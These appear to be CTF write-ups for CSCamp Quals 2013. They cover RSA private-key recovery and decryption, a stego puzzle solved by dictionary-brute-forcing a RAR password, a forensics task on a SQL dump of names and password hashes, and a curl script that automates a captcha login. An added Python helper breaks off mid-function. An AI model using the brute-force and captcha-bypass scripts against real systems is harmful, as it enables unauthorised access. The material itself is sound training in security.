: p = 33478071698956898786044169848212690817704794983713768568912431388982883793878002287614711652531743087737814467999489
: q = 36746043666799590428244633799627952632279158164343087642676032283815739666511279233373417143396810270092798736308917
: totient = (p-1) * (q-1)
: e = 65537
: d = hex(gmpy.invert(e,totient))
: d
'0x740de48760442835baad5e1990453a9d16db7976d3f8bb98bf99c0c01cbe9b9c12b808c80683d1e346c16c79ac162874f28ca610c1b97e5e1ffae95725ce0c6b031c3e188b17187a793b322cc4004c568e76c9b258542ea2a2d6ecd462fff401'

# cat rsatool.py
#!/usr/bin/python2
import base64, fractions, optparse, random
import gmpy

from pyasn1.codec.der import encoder
from pyasn1.type.univ import *

PEM_TEMPLATE = '-----BEGIN RSA PRIVATE KEY-----\n%s-----END RSA PRIVATE KEY-----\n'
DEFAULT_EXP = 65537

def factor_modulus(n, d, e):
    """
    Efficiently recover non-trivial factors of n

    See: Handbook of Applied Cryptography
    8.2.2 Security of RSA -> (i) Relation to factoring (p.287)

    http://www.cacr.math.uwaterloo.ca/hac/
    """
    t = (e * d - 1)
    s = 0

    while True:
        quotient, remainder = divmod(t, 2)

        if remainder != 0:
            break

        s += 1
        t = quotient

    found = False

    while not found:
        i = 1
        a = random.randint(1,n-1)

        while i <= s and not found:
            c1 = pow(a, pow(2, i-1, n) * t, n)
            c2 = pow(a, pow(2, i, n) * t, n)

            found = c1 != 1 and c1 != (-1 % n) and c2 == 1

            i += 1

    p = fractions.gcd(c1-1, n)
    q = (n / p)

    return p, q

class RSA:
    def __init__(self, p=None, q=None, n=None, d=None, e=DEFAULT_EXP):
        """
        Initialize RSA instance using primes (p, q)
        or modulus and private exponent (n, d)
        """

        self.e = e

        if p and q:
            assert gmpy.is_prime(p), 'p is not prime'
            assert gmpy.is_prime(q), 'q is not prime'

            self.p = p
            self.q = q
        elif n and d:   
            self.p, self.q = factor_modulus(n, d, e)
        else:
            raise ValueError('Either (p, q) or (n, d) must be provided')

        self._calc_values()

    def _calc_values(self):
        self.n = self.p * self.q

        phi = (self.p - 1) * (self.q - 1)
        self.d = gmpy.invert(self.e, phi)

        # CRT-RSA precomputation
        self.dP = self.d % (self.p - 1)
        self.dQ = self.d % (self.q - 1)
        self.qInv = gmpy.invert(self.q, self.p)

    def to_pem(self):
        """
        Return OpenSSL-compatible PEM encoded key
        """
        return PEM_TEMPLATE % base64.encodestring(self.to_der())

    def to_der(self):
        """
        Return parameters as OpenSSL compatible DER encoded key
        """
        seq = Sequence()

        for x in [0, self.n, self.e, self.d, self.p, self.q, self.dP, self.dQ, self.qInv]:
            seq.setComponentByPosition(len(seq), Integer(x))

        return encoder.encode(seq)

    def dump(self, verbose):
        vars = ['n', 'e', 'd', 'p', 'q']

        if verbose:
            vars += ['dP', 'dQ', 'qInv']

        for v in vars:
            self._dumpvar(v)

    def _dumpvar(self, var):
        val = getattr(self, var)

        parts = lambda s, l: '\n'.join([s[i:i+l] for i in xrange(0, len(s), l)])

        if len(str(val)) <= 40:
            print '%s = %d (%#x)\n' % (var, val, val)
        else:
            print '%s =' % var
            print parts('%x' % val, 80) + '\n'


if __name__ == '__main__':
    parser = optparse.OptionParser()

    parser.add_option('-p', dest='p', help='prime', type='int')
    parser.add_option('-q', dest='q', help='prime', type='int')
    parser.add_option('-n', dest='n', help='modulus', type='int')
    parser.add_option('-d', dest='d', help='private exponent', type='int')
    parser.add_option('-e', dest='e', help='public exponent (default: %d)' % DEFAULT_EXP, type='int', default=DEFAULT_EXP)
    parser.add_option('-o', dest='filename', help='output filename')
    parser.add_option('-f', dest='format', help='output format (DER, PEM) (default: PEM)', type='choice', choices=['DER', 'PEM'], default='PEM')
    parser.add_option('-v', dest='verbose', help='also display CRT-RSA representation', action='store_true', default=False)

    try:
        (options, args) = parser.parse_args()

        if options.p and options.q:
            print 'Using (p, q) to initialise RSA instance\n'
            rsa = RSA(p=options.p, q=options.q, e=options.e)
        elif options.n and options.d:
            print 'Using (n, d) to initialise RSA instance\n'
            rsa = RSA(n=options.n, d=options.d, e=options.e)
        else:
            parser.print_help()
            parser.error('Either (p, q) or (n, d) needs to be specified')

        rsa.dump(options.verbose)

        if options.filename:
            print 'Saving %s as %s' % (options.format, options.filename)


            if options.format == 'PEM':
                data = rsa.to_pem()
            elif options.format == 'DER':
                data = rsa.to_der()

            fp = open(options.filename, 'wb')
            fp.write(data)
            fp.close()

    except optparse.OptionValueError, e:
        parser.print_help()
        parser.error(e.msg)
# ./rsatool.py -p 33478071698956898786044169848212690817704794983713768568912431388982883793878002287614711652531743087737814467999489 -q 36746043666799590428244633799627952632279158164343087642676032283815739666511279233373417143396810270092798736308917 -n 1230186684530117755130494958384962720772853569595334792197322452151726400507263657518745202199786469389956474942774063845925192557326303453731548268507917026122142913461670429214311602221240479274737794080665351419597459856902143413 -e 65537
Using (p, q) to initialise RSA instance

n =
cad984557c97e039431a226ad727f0c6d43ef3d418469f1b375049b229843ee9f83b1f97738ac274
f5f61f401f21f1913e4b64bb31b55a38d398c0dfed00b1392f0889711c44b359e7976c617fcc734f
06e3e95c26476091b52f462e79413db5

e = 65537 (0x10001)

d =
740de48760442835baad5e1990453a9d16db7976d3f8bb98bf99c0c01cbe9b9c12b808c80683d1e3
46c16c79ac162874f28ca610c1b97e5e1ffae95725ce0c6b031c3e188b17187a793b322cc4004c56
8e76c9b258542ea2a2d6ecd462fff401

p =
d982ec7b440e2869d2535e51f91bacc3eb6eba042e106e6f875c3d17e53db65fffd6e4e9a36084ce
60f83d754dd7f701

q =
eebe6dd23ce7e99c0e2249fecc4418c34af74e418bfa714c3791828414ab18f32fd7e093062a49b0
30225cc845f99ab5

# ipython
: from Crypto.PublicKey import RSA
: keypair = RSA.generate(1024)
: keypair.n = 1230186684530117755130494958384962720772853569595334792197322452151726400507263657518745202199786469389956474942774063845925192557326303453731548268507917026122142913461670429214311602221240479274737794080665351419597459856902143413
: keypair.e = 65537
: keypair.d = 703813872109751212728960868893055483396831478279095442779477323396386489876250832944220079595968592852532432488202250497425262918616760886811596907743384527001944888359578241816763079495533278518938372814827410628647251148091159553
: keypair.p = 33478071698956898786044169848212690817704794983713768568912431388982883793878002287614711652531743087737814467999489
: keypair.q = 36746043666799590428244633799627952632279158164343087642676032283815739666511279233373417143396810270092798736308917
: private = open('private.pem','w')
: private.write(keypair.exportKey())
: private.close()
: exit
# openssl rsautl -decrypt -in message.enc -out /dev/tty -inkey private.pem
F4ct0r!zaTi0N

# cat RSAcrack.py
#!/usr/bin/python
# Raw RSA over stdin (Python 2): ./RSAcrack.py [-d] <exponent_hex> <modulus_hex>
# Without -d it encrypts l-1 byte blocks into l byte blocks; with -d it decrypts
# l byte blocks into l-1 byte blocks, l being the modulus length in bytes.
# No padding is applied, so it only handles data that was encrypted the same raw way.

from sys import*
from string import*

a = argv
[s,p,q] = filter(lambda x:x[:1]!= '-',a)  # positional args: script name, exponent, modulus
print "s = " + str(s)
print "p = " + str(p)
print "q = " + str(q)
d='-d' in a                               # decrypt flag; True/False doubles as 1/0 below
print "d = " + str(d)
e, n = atol(p,16), atol(q,16)             # exponent and modulus, parsed from hex
print "e = " + str(e)
print "n = " + str(n)
l = (len(q) + 1) / 2                      # modulus length in bytes
print "l = " + str(l)
o, inb = l-d, l-1+d                       # output block size, input block size
print "o = " + str(o)
print "inb = " + str(inb)
while s:
 s = stdin.read(inb)
 # big-endian bytes -> integer, modular exponentiation, integer -> o big-endian bytes
 s and map(stdout.write, map(lambda i, b=pow(reduce(lambda x,y : (x<<8L)+y, map(ord,s)), e, n) : chr(b>>8*i&255), range(o-1, -1, -1)))
# cat message.enc | ./RSAcrack.py -d 740de48760442835baad5e1990453a9d16db7976d3f8bb98bf99c0c01cbe9b9c12b808c80683d1e346c16c79ac162874f28ca610c1b97e5e1ffae95725ce0c6b031c3e188b17187a793b322cc4004c568e76c9b258542ea2a2d6ecd462fff401 cad984557c97e039431a226ad727f0c6d43ef3d418469f1b375049b229843ee9f83b1f97738ac274f5f61f401f21f1913e4b64bb31b55a38d398c0dfed00b1392f0889711c44b359e7976c617fcc734f06e3e95c26476091b52f462e79413db5 | strings
F4ct0r!zaTi0N

# CSCamp CTF Quals 2k13: Steganography - Stego 3


Sam says "I love you, no really."
Mike says "Hot steamy grits!"
Mike says "Hot steamy grits!"
Mike says "No."
Sam says "Get off my colon"
Harold says "Who said OJ?"
Sam says "Who said OJ?"
JYA says "Jason paid me for it."
Harold says "Jason paid me for it."
Kenny says "Jason paid me for it."
Jason says "But I read slash-dot"
Phil says "Well smother me in curry sauce and lick me."
Adam says "Did he mean to die just then?"
Phil says "Mike - you ladyboy!"
Mike says "I said, you've got beautiful eyes."
Andy says "Mine's a pint"
Adam says "I'm so excited"
Adam says "I said, you've got beautiful eyes."
Adam says "So avoid that then!"
Harold says "Did he mean to die just then?"
JYA says "But I read slash-dot"
Phil says "Show me the fish!"
Sam says "Okay, now think of a funny line"
Mike says "Well smother me in curry sauce and lick me."
Adam says "Who said OJ?"
Mike says "Mike - you ladyboy!"
JYA says "Okay, now think of a funny line"
Adam says "Jason paid me for it."
Sam says "I never talk politics."
Mike says "Mmmm ... "
Harold says "Okay, now think of a funny line"
Mike says "Mine's a pint"
JYA says "Mike - you ladyboy!"
Kenny says "Who said OJ?"
Andy says "Alive"
Jason says "I'm so excited"
Kenny says "No."
Kenny says "No."
Andy says "I'd say Thursday"
JYA says "I'll be your private dancer, a dancer for money, I'll do what you want me to do."
Mr Hanky says "Mine's a pint"
JYA says "What does MPEG mean?"
Andy says "Has anyone noticed the plot is straying from ... well reason, really... "
JYA says "Mike - you ladyboy!"
Mike says "Mike - you ladyboy!"
Mike says "I said, you've got beautiful eyes."
Jason says "Has anyone noticed the plot is straying from ... well reason, really... "
Mr Hanky says "What does MPEG mean?"
Sam says "I'll be your private dancer, a dancer for money, I'll do what you want me to do."
Harold says "Who said OJ?"
Mike says "I'd say Thursday"
Sam says "So avoid that then!"
Harold says "What does MPEG mean?"
Mike says "Hot steamy grits!"
Kenny says "Did he mean to die just then?"
Kenny says "Well smother me in curry sauce and lick me."
Harold says "Did he mean to die just then?"
Adam says "But I read slash-dot"
Phil says "So avoid that then!"
Sam says "Mine's a pint"
Andy says "So avoid that then!"
end of scene

# wget --quiet http://web.archive.org/web/20100826055053/http://www.scramdisk.clara.net/play/playmaker.zip
# # Use playmaker to get the URL
# wget --quiet http://www.mediafire.com/download/5fppbkaujddijuk/bruteme.rar
# while read line; do result=`unrar x bruteme.rar -p$line 2> /dev/null | grep OK`; if [ "$result" != "" ]; then echo "Password = '$line'"; break; fi; done < dic.txt && cat Flag.txt
Password = 'asap'
The Flag is {fb7df6e9ea6a5eb47263734fc158aceb}

# CSCamp CTF Quals 2k13: Forensics - Forensics 1 (200 points)


# cat dataNov-8-2013.sql
DROP TABLE `myTable`;

CREATE TABLE `myTable` (
  `id` mediumint(8) unsigned NOT NULL auto_increment,
  `name` varchar(255) default NULL,
  `password` varchar(255),
  `permission` mediumint default NULL,
  `score` varchar(100) default NULL,
  PRIMARY KEY (`id`)
) AUTO_INCREMENT=1;

INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Riley Holman","4BA964803B710605F6F7BBFF2CE81BF6",421,"77.88");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Maxine Austin","DE8E13534B39BA8354247F3F1EF85A82",428,"19.88");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Aretha Ball","A46E8222DCB12F466396586DD05F9604",436,"71.37");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Iliana Combs","4956611731BA8F4F4C52A67A0EA4917D",433,"18.58");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Sacha Evans","1F69275D041F9E5C8B43C2D0CF8A95FB",415,"23.13");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Gabriel Floyd","7DA5DF7C8615FD929CFA8F339924E896",416,"15.65");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Cole Pierce","223FB9108E9A85A2E9622F57DD0324F5",421,"70.29");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Carolyn Evans","2B5234CEC28F0253448C25D6816D782A",414,"90.68");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Jelani Rodgers","8B867BE7B0CF51723DFA50038852DDF5",428,"83.10");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Josephine Ratliff","02A7EB4D15539223833CBB2E9FDE85A9",426,"3.45");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Ginger Brooks","71653BA64D976CA38656F54EE9981F99",401,"53.71");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Yuri Suarez","3B8AF637C01F98508A479E010FA90A73",418,"18.35");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Ainsley Stone","562C32E3C78C0317CF7D0789731A918F",425,"35.04");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Molly Powell","BDAE91761A79770577E1F129B32ABD67",436,"32.12");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Alyssa Gregory","52CB473DFBE43624547FFB29700EB040",410,"22.62");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("August Rodgers","78057B4CFAE303BF262CD2CCDD0E01A8",433,"0.75");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Neville Todd","272E6DDAD05D3BFF92C5FA6EB7932424",436,"23.56");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Evan Cohen","120C001D3DD3700C0A2E5A79CBB07039",410,"59.59");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Deborah Garner","346184FCBFC7F7ADD557113284517A7A",447,"99.64");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Steel Richmond","72B3DA05A80855DD6F0874E9C8077E3E",402,"78.22");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Vielka Chambers","E9334B3C18AEF9F8136A0FB76AA5B989",412,"32.31");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Oleg Sherman","871589F79961AA75A701EBC466C0A8E2",448,"15.53");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Wyatt Humphrey","796E2F53AFBF930B1B762D237A1AA112",433,"65.41");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Kay Benson","D86025C1F02A1E270FA47552F6311B2E",413,"77.40");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Lacy West","6EC8DCB8E9A69A0E26446B78C3AA73AE",408,"29.38");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Hiram Hurst","02280B275C73EE7342ACFE7A6B44DBCE",444,"81.44");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Thaddeus Higgins","F996F6E35CA80D3DD14770CBE77C6635",401,"39.35");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Randall Pearson","F29286D07B348490C9D87503B66063C6",420,"72.95");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Grace Mckenzie","EB7F2337B70C4AAC1FC5B2CC9F805D94",431,"29.35");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Aurora Davis","C4640E4D2E7E07B52D1E7167641BE2EB",422,"12.14");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Geraldine Watts","743462B522085EA36BAD2EEDD1C8827F",421,"38.31");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Norman Durham","DEF31249723B8F56245F16C9FF1F5C33",435,"63.53");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Colorado Hess","C6A5DD9969ECB22B498E87F8DCB07F73",417,"37.14");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Cade Mcintyre","3F3C6CA38D531EBF73FF0BB13B870A03",434,"71.96");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Dillon Yang","10A498AC98890B90B5CD8750700BB5BC",419,"89.23");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Haley Branch","FEBB74414FA5BF1888E80F9BAE774D93",435,"51.42");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Finn Woods","2934E3E3EE577D5FD5890708BD1F86FB",400,"47.24");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Craig York","E6E25D7D443428CC84C00A1F28FE83E7",432,"73.24");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Rudyard Mejia","FA1DF603880504104B24EA3C37AA1741",408,"90.53");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Grace Todd","1CE546597AB7E7A254628DC2F4707DE9",429,"12.74");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Sasha Velez","E448BE33DADF0262A4FD3453B225BF49",413,"47.03");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Kieran Bryant","F753400403B3EF3C37173399F9D9E6BD",443,"45.67");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Alfreda Beach","20161525318F501C456D40AEE19CE9D0",433,"62.25");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Vernon Joyce","C4917BA71B8EFE4D358149A074D8EC0B",402,"65.50");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Maryam Sandoval","867F728527AFAF7B30648A219F150C28",407,"57.94");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Lila Lindsey","AC1FE8AD294ED542DF4E930E4C0CEA58",419,"42.03");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Ifeoma Larsen","4F211C6FAB4C9417D58B94C626BBC231",403,"80.25");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Hermione Craig","2292D579EBA69FE5821E58A15C56DBA0",446,"8.18");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("David Crane","B9A586FFFFD480676E183EDAB94C78F3",406,"91.12");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Mercedes Lott","A089077408B7E996D7483DC055097A21",437,"18.61");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Melodie Patton","C2212ACA95303B5BE38E9DE249455F11",406,"52.03");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Denise Cardenas","4FEF84297DF3C2BBB89EC332824948B9",423,"63.72");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Martha Livingston","0EB9689A5B506DA5AD8D5B1FF9B90521",413,"88.61");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Sarah Owen","B645BFAB686B33309F28FC38D9AED798",445,"73.31");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Selma Simon","9C8530BE4F25827013490D4EAB83A503",408,"75.45");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Kylan Mcfadden","5954E473C9BDBE24FF8EA46DECE2F7C5",403,"13.68");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Avram Miranda","F5132BE06D2BC14BC8297E7ADF6307DF",442,"8.17");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Wanda Chambers","FB002E2DA3160A89271C50380A508428",400,"12.05");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Courtney Le","21AFCE12ECB8E29B8AE0B96B2BDAB12D",410,"83.37");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Shay Short","FCF2ABE3A0D5974A2E1D0CBA8DD60B30",424,"63.03");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Chanda Clarke","2E05813EBA25D06B137CC4A25565D980",423,"29.56");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Leroy Haney","FB9D640C103D264E2985EDB4B4DBC61C",406,"7.14");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Nadine Michael","8FA40B7DDE2B1C36B12FD7D834A065AF",415,"41.12");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Drew Donaldson","5FB3DA68B2C2DE5DBDA41EF155B4AF7F",449,"15.88");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Daniel Crane","CE95AB2D9026CF010F1146D80C00C438",408,"67.83");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Ross Stuart","C80920C8DC9EC9FED6B668764BADE7BB",401,"78.26");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Octavius Gamble","2C1B9D48AD88BE425C9C146E3E9EE531",405,"43.60");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Fredericka Rice","B303DEC6AAAC075C8A37D21C06F185E3",426,"71.67");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Vance Huff","5D3C7E74FFAB75FF210F27F4F422C1A2",446,"45.38");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Shaine Ward","6C6AB557DA6CD8DCA4BF3016C20F0EE7",432,"69.75");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Ezekiel Bush","5A7C8125EB2A6665A66038129F00952E",401,"3.46");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Lewis Nguyen","8ADD9803F69410A13335C26CCCFAD855",410,"31.50");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Catherine Daniel","CB30AAAEBA9DDC0383A5F74A4DFA02DD",443,"16.57");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Barry Shepherd","8B7772040D5358EB85F2AD14D32B1389",449,"82.82");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Adrienne Benton","621B2E06494F1AF44C58A9A5BEE5EE64",403,"50.67");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Jillian Alston","3609AAEAC8A0C7652008BE60C5616E1A",415,"52.98");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Chanda Dickson","FD2A9A4A7C0CE0C6CADC723991B36E76",437,"56.76");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Lara Benson","535FA2060136DE4A56DFFFB369AD53EA",422,"0.21");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Deborah Moreno","16A86BBD8913F80F80AB7354982306D1",440,"70.72");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Keaton Navarro","3360C02FFA0F219D8C3D5C09C67E3087",413,"97.27");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Wanda Justice","0F90F41E6374B479A49400BE4B7B0630",419,"5.66");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Sacha Briggs","513386AC2F4B995D9598A5055686C582",423,"33.26");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Nevada Gordon","F10C3F1F9A46490C35D9B3210893F58F",420,"28.47");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Leilani Rivas","A9E928D9D79ABF74AB6CCF6FEB8E21AC",434,"98.00");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Kylie Green","D136FAF95F0AAB1770E7F9FDC189B1E8",411,"10.19");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Brian Welch","2CFC1ECC98D00DE7D87B484E46CD9ECC",435,"11.88");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Orson Livingston","DA593D64D4251BCC040E86B50A1C5D52",426,"3.11");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Mikayla Ratliff","C820573A8E75FB5D3C99D3BA99FB1A7D",408,"38.26");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Mechelle Stout","8113A0AFF55D9262FAD9378E8365514E",409,"49.53");
INSERT INTO `myTable` (`name`,`password`,`permission`,`score`) VALUES ("Gay Buck","D5CC5123B49E33CC7356B8C1EE5D1AEE",402,"77.25");

# names=$(while read line; do hex=`echo "$line" | xxd -p | tr -d '\n'`; if [ "`echo $hex | grep 0d`" != "" ]; then echo "`grep -A 1 "$line" dataNov-8-2013.sql | tail -n 1 | awk -F '"' '{print $2}'`"; fi; done < dataNov-8-2013.sql | tr '\n' ',')
# echo -n ${names:0:-1} | md5sum
71284b9edd33e4141952b325a9c6acda
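
The pipeline above spots the marked rows by grepping the hex dump of each line for `0d`, which can also match across a byte boundary (the bytes `40 d2` contain the substring `0d`), and then takes the name from the row after each hit. An added example, not the writeup's own script, that does the detection on the raw bytes instead: split on LF only so a row's CR stays attached to it, flag rows whose terminator is CRLF, and return either those rows' names or (offset=1) the names of the rows following them, then MD5 the comma-joined list the way the writeup submits it. The dump it runs on is a constructed five-row sample in the same shape as dataNov-8-2013.sql, not the challenge file; pass a path to run it on a real dump.

```python
import hashlib
import re

# Constructed sample in the same shape as dataNov-8-2013.sql (not the challenge
# file): rows normally end in LF, two rows are terminated with CRLF.
SAMPLE_DUMP = (
    b'INSERT INTO `myTable` (`name`,`password`) VALUES ("Riley Holman","4BA9");\n'
    b'INSERT INTO `myTable` (`name`,`password`) VALUES ("Maxine Austin","DE8E");\r\n'
    b'INSERT INTO `myTable` (`name`,`password`) VALUES ("Aretha Ball","A46E");\n'
    b'INSERT INTO `myTable` (`name`,`password`) VALUES ("Iliana Combs","4956");\r\n'
    b'INSERT INTO `myTable` (`name`,`password`) VALUES ("Sacha Evans","1F69");\n'
)

NAME_RE = re.compile(rb'VALUES \("([^"]*)"')


def parse_rows(data):
    """Split the dump on LF only, so a stray CR stays attached to its row.

    Returns one dict per INSERT row: the name column and whether the row was
    terminated with CRLF rather than LF."""
    rows = []
    for raw in data.split(b"\n"):
        m = NAME_RE.search(raw)
        if not m:
            continue                      # DDL, blank lines, comments
        rows.append({"name": m.group(1).decode(), "crlf": raw.endswith(b"\r")})
    return rows


def marked_names(data, offset=0):
    """Names of the rows whose line terminator is CRLF.

    offset=1 returns the name on the row *after* each marked row instead,
    which is what the grep -A 1 | tail -n 1 pipeline above selects."""
    rows = parse_rows(data)
    picked = []
    for idx, row in enumerate(rows):
        if row["crlf"] and 0 <= idx + offset < len(rows):
            picked.append(rows[idx + offset]["name"])
    return picked


def flag_md5(names):
    """MD5 of the comma-joined names, the submission format the writeup uses."""
    return hashlib.md5(",".join(names).encode()).hexdigest()


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DUMP
    for name in marked_names(blob):
        print(name)
    print(flag_md5(marked_names(blob, offset=1)))
```

Checking the terminator byte directly also catches a dump where every row is CRLF except a few LF ones; in that case flip the test in parse_rows and look for the minority.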

# CSCamp CTF Quals 2k13: Web - Robots


# cat robots
#!/bin/bash

name=`curl --silent --cookie-jar botmania --cookie botmania 'http://176.9.193.6/challenges_x/final/wbb_x2/' | grep 'text" name' | awk -F '"' '{print $4}'`
solution=`grep challenge botmania | awk '{print $NF}' | tr '+' ' ' | sed -e 's/%2A/*/' -e 's/%2B/+/' -e 's/%2D/-/' -e 's/%2F/\//' | bc -l`
#--proxy 127.0.0.1:8080
curl --silent --cookie-jar botmania --cookie botmania --request POST --data "$name=$solution&submit=Login" 'http://176.9.193.6/challenges_x/final/wbb_x2/'
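
An added example (not the writeup's script) that does the same job as the cookie-jar/sed/bc part of the pipeline in Python: pull the `challenge` cookie out of the curl cookie jar, URL-decode it, and evaluate the arithmetic with a whitelist AST walker instead of piping server-controlled text into `bc`. `unquote_plus` decodes every encoded operator, whereas each `sed` expression above (no `g` flag) rewrites only the first occurrence on the line. The cookie-jar line is constructed, since the real cookie's exact content is not shown; the HTTP round trip (fetch the form, then POST `$name=$solution`) stays with curl as in the script above.

```python
import ast
import operator
from urllib.parse import unquote_plus

# Constructed cookie-jar content in curl's Netscape format (tab-separated:
# domain, include-subdomains, path, secure, expiry, name, value). The real
# challenge cookie is not shown in the writeup; this shape is a guess that
# matches what the sed/bc pipeline expects (+ for space, %2B etc. for operators).
SAMPLE_JAR = (
    "# Netscape HTTP Cookie File\n"
    "176.9.193.6\tFALSE\t/challenges_x/final/wbb_x2/\tFALSE\t0\tchallenge\t12+%2B+7+%2A+3\n"
)

# Only these binary operators are reachable; anything else is rejected.
OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
}


def challenge_from_jar(jar_text, name="challenge"):
    """Return the value of cookie `name` from a Netscape cookie jar.

    Lines beginning with '#' are comments, except '#HttpOnly_' lines, which
    curl writes for HttpOnly cookies and which still carry a cookie."""
    for line in jar_text.splitlines():
        if not line or (line.startswith("#") and not line.startswith("#HttpOnly_")):
            continue
        fields = line.split("\t")
        if len(fields) == 7 and fields[5] == name:
            return fields[6]
    return None


def safe_eval(expr):
    """Evaluate an arithmetic expression without eval() or bc.

    Walks the AST and accepts only numbers, unary minus and the operators in
    OPS, so a hostile cookie such as __import__('os') raises ValueError
    instead of being executed."""
    def ev(node):
        if isinstance(node, ast.Expression):
            return ev(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
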